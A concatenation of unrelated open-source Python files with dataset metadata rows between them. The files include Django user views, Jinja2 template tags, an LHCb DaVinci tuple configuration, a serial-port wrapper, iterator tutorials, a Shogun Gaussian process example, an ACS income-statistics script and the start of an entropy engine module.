if userform.is_valid():
userform.save()
messages.success(request, "User successfully %s." % action_success)
return HttpResponseRedirect(redirect_url)
_add_error_messages(userform, request, action_success)
return None
@login_required
@permission_required('auth.can_view_users')
def new(request):
userform = UserForm()
response = None
if request.method == 'POST':
userform = UserForm(request.POST)
response = _process_form(userform, request)
template_variables = {'userform': userform,
'country_phone_code':COUNTRY_PHONE_CODE,
'action': "/users/new/",
'id': "create-user-form",
'class': "user-form",
'button_label': "Create",
'loading_text': "Creating...",
'title' : 'New User'}
return response or render(request, 'users/new.html', template_variables)
def check_mobile_number(mobile_number):
response = UserProfile.objects.filter(mobile_number=mobile_number).exists()
return HttpResponse(json.dumps(not response), content_type="application/json")
def check_user_attribute(**kwargs):
response = User.objects.filter(**kwargs).exists()
return HttpResponse(json.dumps(not response), content_type="application/json")
@permission_required('auth.can_view_users')
def index(request):
if request.GET.has_key('mobile_number'):
return check_mobile_number(request.GET['mobile_number'])
if request.GET.has_key('username'):
return check_user_attribute(username=request.GET['username'])
if request.GET.has_key('email'):
return check_user_attribute(email=request.GET['email'])
return render(request, 'users/index.html', { 'users' : User.objects.all(),
'request': request})
@permission_required_for_perm_or_current_user('auth.can_view_users')
def edit(request, user_id):
user = User.objects.get(pk=user_id)
initial={'mobile_number': UserProfile.objects.get(user=user).mobile_number}
userform = EditUserForm(user= request.user, instance=user, initial=initial)
response = None
if request.method == 'POST':
userform = EditUserForm(data=request.POST, user= request.user, instance=user, initial=initial)
response = _process_form(userform, request, 'edited', '/users/'+ str(user_id)+'/edit/')
context_variables = {'userform': userform,
'action' : '/users/%s/edit/'%user_id,
'id': 'edit-user-form','class': 'user-form', 'button_label' : 'Save',
'loading_text' : 'Saving...',
'country_phone_code': COUNTRY_PHONE_CODE,
'title': 'Edit User'}
return response or render(request, 'users/new.html', context_variables)
@permission_required('auth.can_view_users')
def show(request, user_id):
user = User.objects.filter(id=user_id)
if not user.exists():
messages.error(request, "User not found.")
return HttpResponseRedirect("/users/")
return render(request, 'users/show.html', {'the_user': user[0], 'cancel_url': '/users/'})
def _set_is_active(user, status, request):
action_str = "re-" if status else "de"
user.is_active = status
user.save()
messages.success(request, "User %s successfully %sactivated."%(user.username, action_str))
def _activate(request, user_id, status):
user = User.objects.filter(id=user_id)
if not user.exists():
messages.error(request, "User not found.")
return HttpResponseRedirect("/users/")
user = user[0]
if user.is_active is not status:
_set_is_active(user, status, request)
return HttpResponseRedirect("/users/")
@permission_required('auth.can_view_users')
def deactivate(request, user_id):
return _activate(request, user_id, status=False)
@permission_required('auth.can_view_users')
def activate(request, user_id):
return _activate(request, user_id, status=True)
| bsd-3-clause | 8,590,943,829,444,842,000 | 41.206897 | 102 | 0.647467 | false | 3.885714 | false | false | false |
daVinci1980/antebuild | internals/utils.py | 1 | 1110 |
import inspect
import os
import runpy
import specs
# -------------------------------------------------------------------------------------------------
def fixpath(_path, _opts):
return os.path.normpath(os.path.join(_opts.pathPrefix, _path))
# -------------------------------------------------------------------------------------------------
def include(_path):
cwd = os.getcwd()
try:
os.chdir(os.path.dirname(os.path.abspath(_path)))
return _includeInternal(_path)
except IOError:
return _includeInternal(_path + ".ab")
finally:
os.chdir(cwd)
# -------------------------------------------------------------------------------------------------
def _includeInternal(_path):
initGlobals = specs.getProjectGroupDict()
initGlobals['include'] = include
ignoreClasses = [c for c in initGlobals.itervalues() if inspect.isclass(c)]
mod = runpy.run_path(_path, initGlobals)
filteredMod = {}
for k, v in mod.iteritems():
if not inspect.isclass(v) or v not in ignoreClasses:
filteredMod[k] = v
return filteredMod
| bsd-3-clause | 4,108,960,350,575,440,400 | 29 | 99 | 0.474775 | false | 4.663866 | false | false | false |
codedcolors/pygrow | grow/pods/controllers/tags/builtins.py | 1 | 5453 | from datetime import datetime
from grow.common import utils
from grow.pods import locales as locales_lib
from grow.pods.collectionz import collectionz
import collections
import csv as csv_lib
import itertools
import jinja2
import json as json_lib
import markdown
import re
@utils.memoize_tag
def categories(collection=None, collections=None, reverse=None, order_by=None,
_pod=None):
if isinstance(collection, collectionz.Collection):
collection = collection
elif isinstance(collection, basestring):
collection = _pod.get_collection(collection)
else:
text = '{} must be a Collection instance or a collection path, found: {}.'
raise ValueError(text.format(collection, type(collection)))
category_list = collection.list_categories()
def order_func(doc):
return category_list.index(doc.category)
docs = [doc for doc in collection.list_docs(reverse=reverse)]
docs = sorted(docs, key=order_func)
items = itertools.groupby(docs, key=order_func)
return ((category_list[index], pages) for index, pages in items)
def LocaleIterator(iterator, locale):
locale = str(locale)
for i, line in enumerate(iterator):
if i == 0 or line.startswith(locale):
yield line
_no_locale = '__no_locale'
@utils.memoize_tag
def csv(path, locale=_no_locale, _pod=None):
fp = _pod.open_file(path)
if locale is not _no_locale:
fp = LocaleIterator(fp, locale=locale)
rows = []
for row in csv_lib.DictReader(fp):
data = {}
for header, cell in row.iteritems():
if cell is None:
cell = ''
data[header] = cell.decode('utf-8')
rows.append(data)
return rows
@utils.memoize_tag
def docs(collection, locale=None, order_by=None, _pod=None):
collection = _pod.get_collection(collection)
return collection.list_docs(locale=locale, order_by=order_by)
@utils.memoize_tag
def statics(pod_path, locale=None, _pod=None):
return _pod.list_statics(pod_path, locale=locale)
def markdown_filter(value):
try:
if isinstance(value, unicode):
value = value.decode('utf-8')
return markdown.markdown(value)
except UnicodeEncodeError:
return markdown.markdown(value)
_slug_regex = re.compile(r'[\t !"#$%&\'()*\-/<=>?@\[\\\]^_`{|},.]+')
def slug_filter(value):
result = []
for word in _slug_regex.split(value.lower()):
if word:
result.append(word)
return unicode(u'-'.join(result))
@utils.memoize_tag
def static(path, locale=None, _pod=None):
return _pod.get_static(path, locale=locale)
class Menu(object):
def __init__(self):
self.items = collections.OrderedDict()
def build(self, nodes):
self._recursive_build(self.items, None, nodes)
def iteritems(self):
return self.items.iteritems()
def _recursive_build(self, tree, parent, nodes):
children = [n for n in nodes if n.parent == parent]
for child in children:
tree[child] = collections.OrderedDict()
self._recursive_build(tree[child], child, nodes)
@utils.memoize_tag
def nav(collection=None, locale=None, _pod=None):
collection_obj = _pod.get_collection('/content/' + collection)
results = collection_obj.list_docs(order_by='order', locale=locale)
menu = Menu()
menu.build(results)
return menu
@utils.memoize_tag
def breadcrumb(doc, _pod=None):
pass
@utils.memoize_tag
def url(pod_path, locale=None, _pod=None):
doc = _pod.get_doc(pod_path, locale=locale)
return doc.url
@utils.memoize_tag
def get_doc(pod_path, locale=None, _pod=None):
return _pod.get_doc(pod_path, locale=locale)
@jinja2.contextfilter
def render_filter(ctx, template):
if isinstance(template, basestring):
template = ctx.environment.from_string(template)
return template.render(ctx)
@jinja2.contextfilter
def parsedatetime_filter(ctx, date_string, string_format):
return datetime.strptime(date_string, string_format)
@jinja2.contextfilter
def deeptrans(ctx, obj):
return _deep_gettext(ctx, obj)
@jinja2.contextfilter
def jsonify(ctx, obj, *args, **kwargs):
return json_lib.dumps(obj, *args, **kwargs)
def _deep_gettext(ctx, fields):
if isinstance(fields, dict):
new_dct = {}
for key, val in fields.iteritems():
if isinstance(val, (dict, list, set)):
new_dct[key] = _deep_gettext(ctx, val)
elif isinstance(val, basestring):
new_dct[key] = _gettext_alias(ctx, val)
else:
new_dct[key] = val
return new_dct
elif isinstance(fields, (list, set)):
for i, val in enumerate(fields):
if isinstance(val, (dict, list, set)):
fields[i] = _deep_gettext(ctx, val)
elif isinstance(val, basestring):
fields[i] = _gettext_alias(ctx, val)
else:
fields[i] = val
return fields
def _gettext_alias(__context, *args, **kwargs):
return __context.call(__context.resolve('gettext'), *args, **kwargs)
@utils.memoize_tag
def yaml(path, _pod):
fields = utils.parse_yaml(_pod.read_file(path), pod=_pod)
return utils.untag_fields(fields)
@utils.memoize_tag
def json(path, _pod):
fp = _pod.open_file(path)
return json_lib.load(fp)
def date(datetime_obj=None, _pod=None, **kwargs):
_from = kwargs.get('from', None)
if datetime_obj is None:
datetime_obj = datetime.now()
elif isinstance(datetime_obj, basestring) and _from is not None:
datetime_obj = datetime.strptime(datetime_obj, _from)
return datetime_obj
@utils.memoize_tag
def locales(codes, _pod=None):
return locales_lib.Locale.parse_codes(codes)
| mit | 6,887,888,150,770,782,000 | 24.721698 | 78 | 0.686411 | false | 3.325 | false | false | false |
Williams224/davinci-scripts | LambdabNTupleMaker.py | 1 | 5745 | from Gaudi.Configuration import *
from Configurables import DaVinci
#from Configurables import AlgTool
from Configurables import GaudiSequencer
MySequencer = GaudiSequencer('Sequence')
DaVinci.DDDBtag='dddb-20120831'
DaVinci.CondDBtag='sim-20121025-vc-md100'
simulation=True
#only for mdst
#from Configurables import EventNodeKiller
#eventNodeKiller = EventNodeKiller('DAQkiller')
#eventNodeKiller.Nodes = ['DAQ','pRec']
#MySequencer.Members+=[eventNodeKiller]
#################################################################
#Rerun with stripping21 applied
if simulation:
from StrippingConf.Configuration import StrippingConf, StrippingStream
from StrippingSettings.Utils import strippingConfiguration
from StrippingArchive.Utils import buildStreams
from StrippingArchive import strippingArchive
from Configurables import PhysConf
PhysConf().CaloReProcessing=True
stripping="stripping21"
config=strippingConfiguration(stripping)
archive=strippingArchive(stripping)
streams=buildStreams(stripping=config,archive=archive)
MyStream= StrippingStream("MyStream")
MyLines= ["StrippingB2XEtaLb2pKetapLine"]
for stream in streams:
for line in stream.lines:
if line.name() in MyLines:
MyStream.appendLines( [ line ])
from Configurables import ProcStatusCheck
filterBadEvents=ProcStatusCheck()
sc=StrippingConf( Streams= [ MyStream ],
MaxCandidates = 2000,
AcceptBadEvents = False,
BadEventSelection = filterBadEvents)
DaVinci().appendToMainSequence([sc.sequence()])
##################Creating NTuples#####################################
from Configurables import DecayTreeTuple
from Configurables import TupleToolL0Calo
from DecayTreeTuple.Configuration import *
tuple=DecayTreeTuple()
tuple.Decay="[Lambda_b0 -> ^p+ ^K- ^(eta_prime -> ^pi- ^pi+ ^gamma)]CC"
tuple.Branches={"Lambda_b0":"[Lambda_b0 -> p+ K- (eta_prime -> pi- pi+ gamma)]CC"}
tuple.Inputs=["Phys/B2XEtaLb2pKetapLine/Particles"]
tuple.addTool(TupleToolL0Calo())
tuple.TupleToolL0Calo.TriggerClusterLocation="/Event/Trig/L0/Calo"
tuple.TupleToolL0Calo.WhichCalo="HCAL"
tuple.ToolList += [
"TupleToolGeometry"
, "TupleToolDira"
, "TupleToolAngles"
# , "TupleToolL0Calo"
, "TupleToolPid"
, "TupleToolKinematic"
, "TupleToolPropertime"
, "TupleToolPrimaries"
, "TupleToolEventInfo"
, "TupleToolTrackInfo"
, "TupleToolVtxIsoln"
, "TupleToolPhotonInfo"
, "TupleToolMCTruth"
, "TupleToolMCBackgroundInfo"
# , "MCTupleTOolHierachy"
, "TupleToolCaloHypo"
, "TupleToolTrackIsolation"
#, "TupleToolTagging" not used in microdst
]
#from Configurables import TupleToolMCTruth
#from TupleToolMCTruth.Configuration import *
#tuple.addTool(TupleToolMCTruth,name="TruthM")
#tuple.ToolList+= [ "TupleToolMCTruth/TruthM"]
#tuple.TruthM.ToolList = ["MCTupleToolHierachy/Hierachy"]
#tuple.TruthM.addTool(MCTupleToolHierachy,name="Hierachy")
#tuple.TupleToolMCTruth.addTool(MCTupleToolKinematic,name="MCTupleToolKinematic")
#tuple.TupleToolMCTruth.addTool(MCTupleToolHierachy,name="MCTupleToolHierachy")
#tuple.TupleToolMCTruth.addTool(MCTupleToolPID,name="MCTupleToolPID")
#####Look at adding branchesss##############
tuple.addTool(TupleToolDecay,name="Lambda_b0")
from Configurables import TupleToolDecayTreeFitter
tuple.Lambda_b0.addTool(TupleToolDecayTreeFitter("PVFit"))
tuple.Lambda_b0.PVFit.Verbose=True
tuple.Lambda_b0.PVFit.constrainToOriginVertex=True
tuple.Lambda_b0.PVFit.daughtersToConstrain = ["p+","K-","eta_prime"]
tuple.Lambda_b0.ToolList+=["TupleToolDecayTreeFitter/PVFit"]
from Configurables import TupleToolTISTOS
tistos=tuple.Lambda_b0.addTupleTool(TupleToolTISTOS, name="TupleToolTISTOS")
tistos.VerboseL0=True
tistos.VerboseHlt1=True
tistos.VerboseHlt2=True
tistos.TriggerList=["L0PhotonDecision",
"L0ElectronDecision",
"Hlt1TrackPhotonDecision",
"Hlt1TrackAllL0Decision",
"Hlt1TrackMuonDecision",
"Hlt1TrackForwardPassThroughDecision",
"Hlt1TrackForwardPassThroughLooseDecision",
"Hlt1SingleElectronNoIPDecision",
"L0HadronDecision",
"L0LocalPi0Decision",
"L0GlobalPi0Decision",
"L0MuonDecision",
"Hlt2Topo2BodyBBDTDecision",
"Hlt2Topo3BodyBBDTDecision",
"Hlt2Topo4BodyBBDTDecision",
"Hlt2RadiativeTopoTrackTOSDecision",
"Hlt2RadiativeTopoPhotonL0Decision",
"Hlt2TopoRad2BodyBBDTDecision",
"Hlt2TopoRad2plus1BodyBBDTDecision",
"Hlt2Topo2BodySimpleDecision",
"Hlt2Topo3BodySimpleDecision",
"Hlt2Topo4BodySimpleDecision"]
etuple=EventTuple()
etuple.ToolList=["TupleToolEventInfo"]
from Configurables import MCDecayTreeTuple
mctuple=MCDecayTreeTuple("mctuple")
mctuple.ToolList+=["MCTupleToolKinematic","MCTupleToolReconstructed","MCTupleToolHierarchy","MCTupleToolDecayType","MCTupleToolPID"]
mctuple.Decay="[Lambda_b0 -> ^(p+) ^(K-) ^(eta_prime -> ^pi- ^pi+ ^gamma)]CC"
MySequencer.Members.append(etuple)
MySequencer.Members.append(tuple)
MySequencer.Members.append(mctuple)
DaVinci().InputType='DST'
DaVinci().UserAlgorithms+=[MySequencer]
DaVinci().TupleFile="Output.root"
DaVinci().HistogramFile="histos.root"
DaVinci().DataType='2012'
DaVinci().EvtMax=-1
DaVinci().PrintFreq=1000
DaVinci().MoniSequence=[tuple]
DaVinci().Simulation=simulation
| mit | -9,160,977,961,897,626,000 | 32.596491 | 132 | 0.694865 | false | 3.186356 | true | false | false |
MediaKraken/MediaKraken_Deployment | source/common/common_serial.py | 1 | 2296 | """
Copyright (C) 2015 Quinn D Granfor <[email protected]>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
version 2, as published by the Free Software Foundation.
This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License version 2 for more details.
You should have received a copy of the GNU General Public License
version 2 along with this program; if not, write to the Free
Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
MA 02110-1301, USA.
"""
import time
from kivy.utils import platform
# import the pyserial library for use in rs232c communications
if platform != 'android':
import serial
class CommonSerial:
"""
Class for interfacing via serial devices
"""
def __init__(self, dev_port='/dev/ttyUSB1', dev_baudrate=9600,
dev_parity=serial.PARITY_ODD,
dev_stopbits=serial.STOPBITS_TWO,
dev_bytesize=serial.SEVENBITS):
"""
Open serial device for read/write
"""
self.serial_device = serial.Serial(port=dev_port,
baudrate=dev_baudrate,
parity=dev_parity,
stopbits=dev_stopbits,
bytesize=dev_bytesize
)
self.serial_device.open()
self.serial_device.isOpen()
def com_serial_read_device(self):
"""
Read data from serial device
"""
time.sleep(1)
read_data = ''
while self.serial_device.inWaiting() > 0:
read_data += self.serial_device.read(1)
return read_data
def com_serial_close_device(self):
"""
Close serial device
"""
self.serial_device.close()
def com_serial_write_device(self, message):
"""
Send data to serial device
"""
self.serial_device.write(message)
| gpl-3.0 | -3,219,449,462,611,585,500 | 31.275362 | 69 | 0.574042 | false | 4.510806 | false | false | false |
rajendrauppal/coding-interview | programming_languages/Python/iterator.py | 1 | 2933 |
# for loop for iterating a list
print("iterate a list")
for i in [1, 2, 3, 4]:
print(i)
# for loop for iterating a string
print("iterate a string")
for c in "iteratable":
print(c)
# for loop for iterating a dictionary
print("iterate a dictionary")
for k in {"a": 1, "b": 2}:
print(k)
# for loop for iterating a file line by line
print("iterate a file")
for line in open("input.txt"):
print(line)
# list, string, dict, file stream are called iterable objects in python.
# built-in functions use these iterables
s = ",".join(["a", "b", "c"])
print(s)
d = ",".join({"x": 1, "y": 2})
print(d)
print(list("iterable"))
print(list({"x": 1, "y": 2}))
x = iter([1, 2, 3])
print(x.next())
print(x.next())
print(x.next())
# print(x.next()) # raises StopIteration
# good interview question
# implement your own xrange function
class yrange:
def __init__(self, n):
self.n = n
self.i = 0
def __iter__(self):
# __iter__ method makes an object iterable
# iter function calls __iter__ method behind the scenes
# the return value of __iter__ is an iterator
# it should implement next() method and raise StopIteration
# when there are no more elements.
return self
def next(self):
if self.i < self.n:
i = self.i
self.i += 1
return i
else:
raise StopIteration()
# lets try yrange
y = yrange(3)
print(y.next())
print(y.next())
print(y.next())
# print(y.next()) # raises StopIteration
print(list(yrange(5)))
print(sum(yrange(5)))
# good interview question
# implement reverse iterator
class rev_iter:
def __init__(self, iterable):
self.i = len(iterable) - 1
self.iterable = iterable
def __iter__(self):
return self
def next(self):
if self.i >= 0:
i = self.iterable[self.i]
self.i -= 1
return i
else:
raise StopIteration()
r = rev_iter([1, 2, 3, 4])
print(r.next())
print(r.next())
print(r.next())
print(r.next())
# print(r.next()) # StopIteration
# THE ITERATION PROTOCOL
# in python, the iterator objects are required to implement
# these two methods:
# __iter__ returns the iterator object itself.
# __next__ returns next value from the iterator. if there is no
# more items, it should raise StopIteration exception.
# lets implement a Counter iteratable class
class Counter(object):
def __init__(self, low, high):
self.current = low
self.high = high
def __iter__(self):
return self
def next(self):
if self.current <= self.high:
i = self.current
self.current += 1
return i
else:
raise StopIteration()
c = Counter(5, 10)
for i in c:
print(i)
| mit | 8,716,354,372,421,319,000 | 21.845528 | 72 | 0.568019 | false | 3.479241 | false | false | false |
daohu527/leetcode_learning | 676. Implement Magic Dictionary/code.py | 1 | 1299 | class MagicDictionary(object):
def __init__(self):
"""
Initialize your data structure here.
"""
self.table = {}
def buildDict(self, dict):
"""
Build a dictionary through a list of words
:type dict: List[str]
:rtype: void
"""
for v in dict:
n = len(v)
if n in self.table:
self.table[n].append(v)
else:
self.table[n] = [v]
def search(self, word):
"""
Returns if there is any word in the trie that equals to the given word after modifying exactly one character
:type word: str
:rtype: bool
"""
n = len(word)
if n in self.table:
for v in self.table[n]:
if self.cmp(v, word, n):
return True
return False
def cmp(self, p, q, n):
res = 0
if p == q:
return False
for i in range(n):
if p[i] != q[i]:
res += 1
if res > 1:
return False
return True
# Your MagicDictionary object will be instantiated and called as such:
# obj = MagicDictionary()
# obj.buildDict(dict)
# param_2 = obj.search(word) | gpl-3.0 | 4,621,180,226,200,586,000 | 24.490196 | 116 | 0.468822 | false | 4.245098 | false | false | false |
arasuarun/shogun | examples/undocumented/python_modular/graphical/regression_gaussian_process_modelselection.py | 26 | 2694 | #!/usr/bin/env python
from numpy import *
from pylab import plot, show, legend, fill_between, figure, subplot, title
def regression_gaussian_process_modelselection (n=100, n_test=100, \
x_range=5, x_range_test=10, noise_var=0.4):
from modshogun import RealFeatures, RegressionLabels
from modshogun import GaussianKernel
from modshogun import GradientModelSelection, ModelSelectionParameters
from modshogun import GaussianLikelihood, ZeroMean, \
ExactInferenceMethod, GaussianProcessRegression, GradientCriterion, \
GradientEvaluation
# easy regression data: one dimensional noisy sine wave
X_train = random.rand(1,n)*x_range
X_test = array([[float(i)/n_test*x_range_test for i in range(n_test)]])
y_test = sin(X_test)
y_train = sin(X_train)+random.randn(n)*noise_var
# shogun representation
labels = RegressionLabels(y_train[0])
feats_train = RealFeatures(X_train)
feats_test = RealFeatures(X_test)
# GP specification
kernel = GaussianKernel(10, 0.05)
mean = ZeroMean()
likelihood = GaussianLikelihood(0.8)
inf = ExactInferenceMethod(kernel, feats_train, mean, labels, likelihood)
inf.set_scale(2.5)
gp = GaussianProcessRegression(inf)
means = gp.get_mean_vector(feats_test)
variances = gp.get_variance_vector(feats_test)
# plot results
figure()
subplot(2, 1, 1)
title('Initial parameter\'s values')
plot(X_train[0], y_train[0], 'bx') # training observations
plot(X_test[0], y_test[0], 'g-') # ground truth of test
plot(X_test[0], means, 'r-') # mean predictions of test
fill_between(X_test[0], means-1.96*sqrt(variances),
means+1.96*sqrt(variances), color='grey')
legend(["training", "ground truth", "mean predictions"])
# evaluate our inference method for its derivatives
grad = GradientEvaluation(gp, feats_train, labels, GradientCriterion(), False)
grad.set_function(inf)
# handles all of the above structures in memory
grad_search = GradientModelSelection(grad)
# search for best parameters
best_combination = grad_search.select_model(True)
# outputs all result and information
best_combination.apply_to_machine(gp)
means = gp.get_mean_vector(feats_test)
variances = gp.get_variance_vector(feats_test)
# plot results
subplot(2, 1, 2)
title('Selected by gradient search parameter\'s values')
plot(X_train[0], y_train[0], 'bx') # training observations
plot(X_test[0], y_test[0], 'g-') # ground truth of test
plot(X_test[0], means, 'r-') # mean predictions of test
fill_between(X_test[0], means-1.96*sqrt(variances),
means+1.96*sqrt(variances), color='grey')
legend(["training", "ground truth", "mean predictions"])
show()
if __name__=='__main__':
regression_gaussian_process_modelselection()
| gpl-3.0 | 560,818,344,550,251,460 | 27.967742 | 79 | 0.726429 | false | 3.092997 | true | false | false |
sandiegodata/age-friendly-communities | users/rashmi/income_stats.py | 1 | 8149 | #! /usr/bin/env python
################################################################################
#
# income_stats.py
#
# Script to extract income information specific to individuals 55 and older from
# the ACS archive containing it and to output the same on a per SRA and zipcode
# basis for the SD county
#
# Dependencies:
#
# Data files must be present in the current working directory
#
# Usage:
#
# python income_stats.py
#
import sys
import os
import shutil
import re
import pandas as pd
import numpy as np
import pprint
from zipfile import ZipFile
from collections import defaultdict, OrderedDict
import sdpyutils as sdpy
#
# GLOBALS
#
# current working directory
CWD = os.getcwd()
TMPDIR = os.path.join(CWD,"tmp")
# data file(s)
VERSION = "2015"
DATAZIP = "aff_B17024_sd_county_" + VERSION + ".zip"
# output file(s)
OUT_CSV1 = "B17024_estimates_sd_county_55_over_" + VERSION + ".csv"
OUT_CSV2 = "low_income_data_sd_county_" + VERSION + ".csv"
#
# Removes the temp directory and its contents
#
def cleanup(doCleanup):
# Cleanup the temp directory only if we created it here
if doCleanup:
if os.path.exists(TMPDIR):
shutil.rmtree("tmp")
doCleanup = False
#
# processMetaData
#
# extracts information from the specified metadata file and returns it as a
# data frame
#
def processMetaData(metafile):
csvdata = pd.read_csv(metafile,header=None)
#print csvdata
print("parsing file: " + metafile)
return csvdata
#
# modifyDataLabels
#
# function to modify data lables for the specified target using values in
# dict_fields
#
# Returns:
# ratio_dict - dictionary of modified labels grouped by ratio range
# age_dict - dictionary of modified labels grouped by age range
# modifiedLabels - full list of modified labels (same ordering as that of
# targetLabels)
#
def modifyDataLabels(targetLabels, df_fields):
# convert to dictionary for easier lookup
dict_fields = df_fields.set_index(0).T.to_dict('list')
# generate the regex instance for the specified pattern
prefix = " - "
regex = re.compile('(.*); (.*) years(.*):(.*)')
# generate replacement labels for targeted labels using metadata
# in df_fields
modifiedLabels = []
# FIX ME: need an ordered defualt dict; for now use ordered dict only
ratio_dict = OrderedDict(); age_dict = OrderedDict()
for name in targetLabels[1:]:
if name in dict_fields:
m = regex.match(dict_fields[name][0])
ratioTag = ""; ageTag = ""
if m.group(4).startswith(prefix):
ratioTag = m.group(4)[len(prefix):]
else:
ratioTag = "Total"
ageTag = m.group(2) + m.group(3)
label = ratioTag + " (" + ageTag + ")"
#print (name + ": " + label)
if ageTag in age_dict:
age_dict[ageTag].append(label)
else:
age_dict[ageTag] = [label]
if ratioTag in ratio_dict:
ratio_dict[ratioTag].append(label)
else:
ratio_dict[ratioTag] = [label]
modifiedLabels.append(label)
else:
modifiedLabels.append(name)
return ratio_dict, age_dict, modifiedLabels
#
# addSRAaggregates
#
# aggregates per zipcode/ZCTA data and populates the unique entry per SRA with
# the aggreagated values (in the specified data frame) and returns the modified
# data frame
#
# Note: this requires that data be in a specific format (see df_geoids dataframe)
#
def addSRAaggregates(df,targetCols):
for name, group in df.groupby('SRA'):
idx = group.last_valid_index()
#print df.loc[[idx]]
for col in targetCols:
df.set_value(idx,col,group[col].sum())
return df
#
# computeLowIncomeData
#
# aggregates data for all ratios below 2.00 for all age groups and returns
# the result in a new data frame
#
def computeLowIncomeData(df_incomes,df_geoids,ratio_dict,age_dict):
# low income is defined as 200% (or below) of the federal poverty level
# i.e.: the income to poverty level ratio under 2.0
LOW_INCOME_RATIO_TRESH = "1.85 to 1.99"
geoCols = df_geoids.columns.tolist()
df = df_incomes.iloc[:,len(geoCols):]
df = df_incomes.reset_index(drop=True)
df_sum_list = []
cols = []
for age_group, colnames in age_dict.iteritems():
#print(str(age_group) + ": " + str(colnames))
try:
idx = [i for i, s in enumerate(colnames) if LOW_INCOME_RATIO_TRESH in s]
df_sum = df[colnames[1:(idx[0]+1)]].sum(axis=1)
df_sum_list.append(df_sum)
except Exception, e:
df_sum = pd.DataFrame(columns=[age_group],
data=np.zeros(shape=(len(df_geoids.index),1)))
df_sum_list.append(df_sum)
cols.append(age_group + " (Low Income)")
df1 = pd.concat(df_sum_list,axis=1)
df1.columns = cols
df1["55 and Over (Low Income)"] = df1[cols].sum(axis=1)
df1["65 and Over (Low Income)"] = df1[cols[1:]].sum(axis=1)
li_df = pd.concat([df_geoids,df1],axis=1)
li_df = addSRAaggregates(li_df,df1.columns.tolist())
#print li_df
return li_df
#
# processData
#
# extracts relevant information from the specified data file and carries out
# transformations to generate income data for age groups 55 and over as well
# for low income individuals 55 and over on a per ZCTA basis
#
# results are written to CSV files specified by OUT_CSV{1,2}
#
def processData(df_fields,datafile):
# index of GEO.id2 which contains ZCTA as numbers
COL_ZCTA_IDX = 1
COL_ZCTA = 'GEO.id2'
# this is the first field that holds income info for 55+ age groups
START_COL = 'HD01_VD93'
# extract only data for income estimates for 55 and over categories
startIndex = df_fields[df_fields[0] == START_COL].index.tolist()[0]
endIndex = len(df_fields) - 1
# print("si: " + str(startIndex) + " ei: " + str(endIndex))
l = df_fields[0].tolist()
# we skip over cols that contain margins of error (i.e.: every other col)
cols = [l[COL_ZCTA_IDX]] + l[startIndex:endIndex:2]
csvdata = pd.read_csv(datafile,skipinitialspace=True,usecols=cols)
#print csvdata.head()
print("parsing data file: " + datafile)
df_geoids = sdpy.createGeoidsData()
geoCols = df_geoids.columns.tolist()
# add single level col headers with age and ratio tags
ratio_dict, age_dict, modifiedCols = modifyDataLabels(cols,df_fields)
out_df = pd.merge(left=df_geoids,right=csvdata[1:],left_on='ZCTA',
right_on=COL_ZCTA,how='left').fillna(0)
out_df.drop(COL_ZCTA,axis=1,inplace=True)
out_df.columns = geoCols + modifiedCols
tmp_df = out_df[modifiedCols].apply(pd.to_numeric)
out_df = pd.concat([df_geoids,tmp_df],axis=1)
out_df.columns = geoCols + modifiedCols
li_df = computeLowIncomeData(tmp_df,df_geoids,ratio_dict,age_dict)
#print li_df.head()
li_df.to_csv(OUT_CSV2, index=False)
print("output: " + OUT_CSV2)
out_df = addSRAaggregates(out_df,modifiedCols)
#print out_df.head()
out_df.to_csv(OUT_CSV1, index=False)
print("output: " + OUT_CSV1)
################################################################################
#
# main
#
def main():
# indicates whether to cleanup before exiting the script
doCleanup = False
metadataFile = ''; dataFile = ''
if not os.path.exists(TMPDIR):
os.makedirs(TMPDIR)
doCleanup = True
# unzip the archive
try:
zipf = ZipFile(os.path.join(CWD,DATAZIP),'r')
zipf.extractall(TMPDIR)
zipf.close()
for file in os.listdir(TMPDIR):
if file.endswith("metadata.csv"):
metadataFile = file
elif file.endswith("ann.csv"):
dataFile = file
else:
continue
#print("metadata file: " + metadataFile + " data file: " + dataFile)
df_fields = processMetaData(os.path.join(TMPDIR,metadataFile))
processData(df_fields, os.path.join(TMPDIR,dataFile))
except:
e = sys.exc_info()[0]
print("Error: Failed to extract data archive")
print("Error: " + str(e))
cleanup(doCleanup)
exit()
cleanup(doCleanup)
# end: main
if __name__ == "__main__":
main()
else:
# do nothing
pass
| mit | 8,053,278,188,660,006,000 | 25.345638 | 82 | 0.642287 | false | 3.029368 | false | false | false |
Virginian/WES-entropy-client | src-python/WesEntropy/Engine/engine.py | 1 | 5656 | # Copyright 2014-2015 Whitewood Encryption Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''WES Entropy Engine'''
import logging
import time
import WesEntropy.Engine.utilities as utilities
import WesEntropy.Engine.sp800_90a as sp800_90a
import WesEntropy.Engine.entropysource as entropysource
VERSION = '1.0'
#pylint: disable=R0903
class EntropyEngine(object):
'''
Construct an entropy engine of the following form:
drbg_source raw_source
| |
| (rate) |
V V
drbg---------------->XOR
|
|
V
rand_bits
This abstracts all the constructions in NIST SP800-90C, while also
allowing for other implementations as needed.
The sources are to be EntropySource objects, or a specification for
constructing an EntropySource object. The rate at which the DRBG is
to be reseeded can be numeric, indicating the number of times we
can pull bits from the source before we reseed, or one of the
following string values:
MINIMAL : Go the longest that NIST SP800-90A allows in this case.
LINESPEED : Put in one bit of entropy for each bit we take out.
'''
def __init__(self, drbg_spec, drbg_source, drbg_reseed_rate, raw_source):
self.drbg = None
self.raw = None
if drbg_spec is not None and drbg_source is not None:
self.drbg = sp800_90a.new(drbg_spec, drbg_source, drbg_reseed_rate)
if raw_source is not None:
self.raw = entropysource.new(raw_source)
self.total_bytes = 0
self.start_time = time.time()
if not self.drbg and not self.raw:
raise ValueError(
'Cannot construct engine with neither DRBG nor raw source.')
def get_stats(self):
'''Get statistics on amount of entropy consumed/produced'''
stats = {'info': {},
'consumed': {},
'produced': {}}
